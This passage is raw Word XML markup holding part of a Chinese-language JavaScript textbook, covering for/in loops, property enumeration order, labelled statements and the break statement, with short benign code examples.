        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在执行</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>语句的过程中，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScr</w:t>
      </w:r>
      <w:r>
        <w:t>ipt</w:t>
      </w:r>
      <w:r>
        <w:t>解释器首先计算</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>表达式。如果表达式为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScirpt</w:t>
      </w:r>
      <w:r>
        <w:t>解释器将会跳过循环并执行后续的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。如果表达式等于一个原始值，这个原始值将会转换为与之对应的包装对象（</w:t>
      </w:r>
      <w:r>
        <w:t>wrapper object</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>见</w:t>
      </w:r>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>。否则，</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>本身已经是对象了。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会依次枚举对象的属性来执行循环。然而在每次循环之前，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>都会先计算</w:t>
      </w:r>
      <w:r>
        <w:t>variable</w:t>
      </w:r>
      <w:r>
        <w:t>表达式的值，并将属性名（一个字符串）赋值给它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，只要</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中</w:t>
      </w:r>
      <w:r>
        <w:t>vari</w:t>
      </w:r>
      <w:r>
        <w:t>able</w:t>
      </w:r>
      <w:r>
        <w:t>的值可以当做赋值表达式的左值，它可以是任意表达式。每次循环都会计算这个表达式，也就是说每次循环它计算的值有可能不同。例如，可以使用下面这段代码将所有对象属性复制至一个数组中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1,y:2,z:3};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[],i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(a[i++]in o)/*empty*/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组不过是一种特殊的对象，因此，</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环可以像枚举对象属性一样枚举数组索引。例如，在上面的代码之后加上这段代码就可以枚举数组的索引</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">for(i in </w:t>
      </w:r>
      <w:r>
        <w:t>a)console.log(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其实，</w:t>
      </w:r>
      <w:r>
        <w:t>for/i n</w:t>
      </w:r>
      <w:r>
        <w:t>循环并不会遍历对象的所有属性，只有</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可枚举</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable</w:t>
      </w:r>
      <w:r>
        <w:t>）的属性才会遍历到（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）。由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心所定义的内置方法就不是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可枚举的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。比如，所有的对象都有方法</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>，但</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环并不枚举</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>这个属性。除了内置方法之外，还有很多内置对象的属性也是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不可枚举的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>nonenumerable</w:t>
      </w:r>
      <w:r>
        <w:t>）。而代码中定义的所有属性和方法都是可枚举的（</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节会讲到，但在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中可以通过特</w:t>
      </w:r>
      <w:r>
        <w:t>殊手段让可枚举属性变为不可枚举）。对象可以继承其他对象的属性，那些继承的自定义属性（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>枚举出来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>的循环体删除了还未枚举的属性，那么这个属性将不会再枚举到。如果循环体定义了对象的新属性，这些属性通常也不会枚举到（然而，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的有些实现是可以枚举那些在循环体中增加的继承属性的）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性枚举的顺序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>规范并没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环按照何种顺序来枚举对象属性。但实际上，主流浏览器厂商的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现是按照属性定义的先后</w:t>
      </w:r>
      <w:r>
        <w:t>顺序来枚举简单对象的属性，先定义的属性先枚举。如</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>果使用对象直接量的形式创建对象，则将按照直接量中属性的出现顺序枚举。有一些网站和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>库是依赖于这种枚举顺序的，浏览器厂商不大可能会修改这个顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上一段讨论了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器枚举</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>简单</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象一种交互的属性枚举顺序。在下列情况下，枚举的顺序取决于具体的实现（并且是非交互的）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>对象继承了可枚举属性；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>对象具有整数数组索引的属性；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>删除了对象已有的属性；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）或者类似的方法改变了对象的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了所有非继承的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>自有</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>属性以外的继承属性（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）都往往（但并不是所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现都是如此）都是可枚举的，而且可以按照它们定义的顺序进行枚举。如果对象属性继承自多个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>原型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>）（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.1.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），也就是说它的原型链上有多个对象，那么链上面的每一个原型对象的属性的遍历也是依照特定顺序执行的。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一些（但不是全部）实现依照数字顺序来枚举数组属性，而不</w:t>
      </w:r>
      <w:r>
        <w:t>是某种特定的顺序。但当数组元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素的索引是非数字或数组是稀疏数组（数组索引是不连续的）时它们则按照特定顺序枚举。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="5_6_Tiao_Zhuan_"/>
      <w:r>
        <w:t>5.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　跳转</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中另一类语句是跳转语句（</w:t>
      </w:r>
      <w:r>
        <w:t>jump statement</w:t>
      </w:r>
      <w:r>
        <w:t>）。从名称就可以看出，它使得</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的执行可以从一个位置跳转到另一个位置。</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句是跳转到循环或者其他语句的结束。</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句是终止本次循环的执行并开始下一次循环的执行。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的语句可以命名或带有标签，</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>可以标识目标循环或者其他语句标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>retu</w:t>
      </w:r>
      <w:r>
        <w:t>rn</w:t>
      </w:r>
      <w:r>
        <w:t>语句让解释器跳出函数体的执行，并提供本次调用的返回值。</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语句触发或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>抛出</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>一个异常，它是与</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch/finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句一同使用的，这些语句指定了处理异常的代码逻辑。这是一种复杂的跳转语句，当抛出一个异常的时候，程序将跳转至最近的闭合异常处理程序，这个异常处理程序可以是在同一个函数中或者在更高层的调用栈中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接下来会详细讲述每一种跳转语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="5_6_1_Biao_Qian_Yu_Ju_"/>
      <w:r>
        <w:t>5.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　标签语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>语句是可以添加标签的，标签是由语句前的标识符和冒号组成：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>identifer:statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过给语句定义标签，就</w:t>
      </w:r>
      <w:r>
        <w:t>可以在程序的任何地方通过标签名引用这条语句。也可以对多条语句定义标签，尽管只有在给语句块定义标签时它才更有用，比如循环和条件判断语句。通过给循环定义一个标签名，可以在循环体内部使用</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>来退出循环或者直接跳转到下一个循环的开始。</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中唯一可以使用语句标签的语句。本章接下来会有讲述。这里有一个例子，其中</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环定义了一个标签，</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句使用了这个标签</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mainloop:while(token!=null){//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略这里的代码</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>continue mainloop;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳转到下一次循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略这里的代码</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这里用做标签的</w:t>
      </w:r>
      <w:r>
        <w:t>identifier</w:t>
      </w:r>
      <w:r>
        <w:t>必须是一个合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>标识符，而不能是一个保留字。标签的命名空间和变量或函数的命名空间是不同的，因此可以使用同一个标识符作为语句标签和作为变量名或函数名。语句标签只有在它所起作用的语句（当然也可以在它</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的子句中）内是有定义的。一个语句标签不能和它内部的语句标签重名，但在两个代码段不相互嵌套的情</w:t>
      </w:r>
      <w:r>
        <w:t>况下是可以出现同名的语句标签的。带有标签的语句还可以带有标签，也就是说，任何语句可以有很多个标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="5_6_2_breakYu_Ju_"/>
      <w:r>
        <w:t>5.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>单独使用</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句的作用是立即退出最内层的循环或</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句。它的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于它能够使循环和</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句退出，因此这种形式的</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>只有出现在这类语句中才是合法的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们在</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句的例子中已经见到过</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句。在循环中，不论出于什么原因，只要不想继续执行整个循环，就可以用</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>来提前退出。当循环终止条件非常复杂时，在函数体内使用</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>reak</w:t>
      </w:r>
      <w:r>
        <w:t>语句实现这些条件判断的做法要比直接在循环表达式中写出这个复杂终止条件的做法简单很多。下面的例子中的循环遍历整个数组元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素来查找某个特定的值，当整个数组遍历完成后会正常退出循环，如果找到了需要查找的数组元素，则使用</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句退出循环：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a[i]==target)break;</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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中同样允许</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>关键字后面跟随一个语句标签（只有标识符，没有冒号）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break labelname;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>和标签一块使</w:t>
      </w:r>
      <w:r>
        <w:t>用时，程序将跳转到这个标签所标识的语句块的结束，或者直接终止这个闭合语句块的执行。当没有任何闭合语句块指定了</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>所用的标签，这时会产生一个语法错误。当使用这种形式的</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句时，带标签的语句不应该是循环或者</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句，因为</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>跳出</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>任何闭合的语句块。这里的语句可以是由花括号括起来的一组语句，使用同一个标签来标识这一组语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
